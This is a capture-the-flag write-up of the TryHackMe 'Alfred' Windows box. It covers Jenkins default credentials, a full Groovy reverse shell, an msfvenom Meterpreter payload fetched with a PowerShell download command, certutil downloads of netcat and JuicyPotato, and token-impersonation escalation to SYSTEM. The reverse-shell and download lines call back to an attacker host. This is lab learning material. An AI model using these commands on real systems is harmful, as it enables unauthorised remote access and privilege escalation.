## Alfred (TryHackMe)

> Chris Noseworthy | August 29 2020

**nmap scan (top 1000 ports)**
* port 80 - running a webserver - Microsoft IIS 7.5
* port 3389 - running a remote desktop/VNC instance
* port 8080 - running Jenkins (Jetty 9.4.z-SNAPSHOT)

Initial enumeration of the jenkins admin login revealed weak credentials:
> "admin:admin"

The script console in jenkins allows you to run "groovy scripts", and of course on the web there is a "groovy reverse shell" available  
Here is the code:

> String host="10.2.0.130";  
>
> int port=8044;  
>
> String cmd="cmd.exe";  
>
> Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

After setting up a netcat listener ("nc -nvlp 8044"), I gained a low priv shell on the machine.  
However, given that this box is supposed to teach me how to use new tools, I decided to abandon that shell and get one the TryHackMe way.  
So I cloned into the _Nishang_ repo and copied the Invoke-PowershellTCP.ps1 over to my working dir.  
After starting a new Project in Jenkins I was able to add a powershell command to download and run the malicious module.  
I spun up a python server to serve the module, and set up a netcat listener to wait for the connect-back.

![jenkins-project](Build-menu.png)
![python-srv](python-srv.png)
![shell](powershell.png)

This resulted in a low level shell, the username being "bruce".  
A quick **whoami /priv** revealed that user has SeImpersonate privilege, which means token impersonation (and Rotten Potato/Juicy Potato) is available for privesc.  

![user flag](user-flag.png)
![user privs](SeImpersonate.png)

### TryHackMe Method

I set up a handler in Metasploit, then used msfvenom to create a malicious exe with the reverse shell.
> use multi/handler
>
> added lhost and lport
>
> added appropriate payload
>
> run

> msfvenom -p windows/meterpreter/reverse_tcp -e LHOST=xxxxxxxxxx LPORT=xxxx x86/shikata-ga-nai -f exe -o raphael.exe

Then place the payload on the victim machine using a powershell download command:

> powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.2.0.130:80/raphael.exe','raphael.exe')"

Then, I ran the command **Start-Process "raphael.exe"** and I was connected to the box again, but this time in a meterpreter shell.  
With the _SeImpersonate_ priv in metasploit, this is an easy win.

> load incognito
>
> list_tokens -u
>
> impersonate_token "NT AUTHORITY\SYSTEM"
>
> getuid

And I was root. Final step is to get the flag, found in C:\windows\system32\config

![root flag](root-flag.png)

### Non-Metasploit method

I didn't use powershell for this box, when left to my own devices. Instead, I used the groovyscript exploit on the jenkins script console, seen above.  
Then, to take advantage of the _SeImpersonate_ priv, I downloaded netcat and the JuicyPotato exe to the box in a temp dir.

> certutil -urlcache -f http://10.2.0.130/nc.exe nc.exe
>
> certutil -urlcache -f http://10.2.0.130/JuicyPotatato.exe jp.exe

Then, it was simply a matter of setting up a netcat listener on my box, running the exploit, and boom I was root.

> nc -nvlp 6969
> jp.exe -t * -l 9999 -p C:\windows\system32\cmd.exe -a "/c C:\temp\nc.exe -e cmd.exe 10.2.0.130 6969"

![juicy potato attack](juicy.png)
![root](root.png)
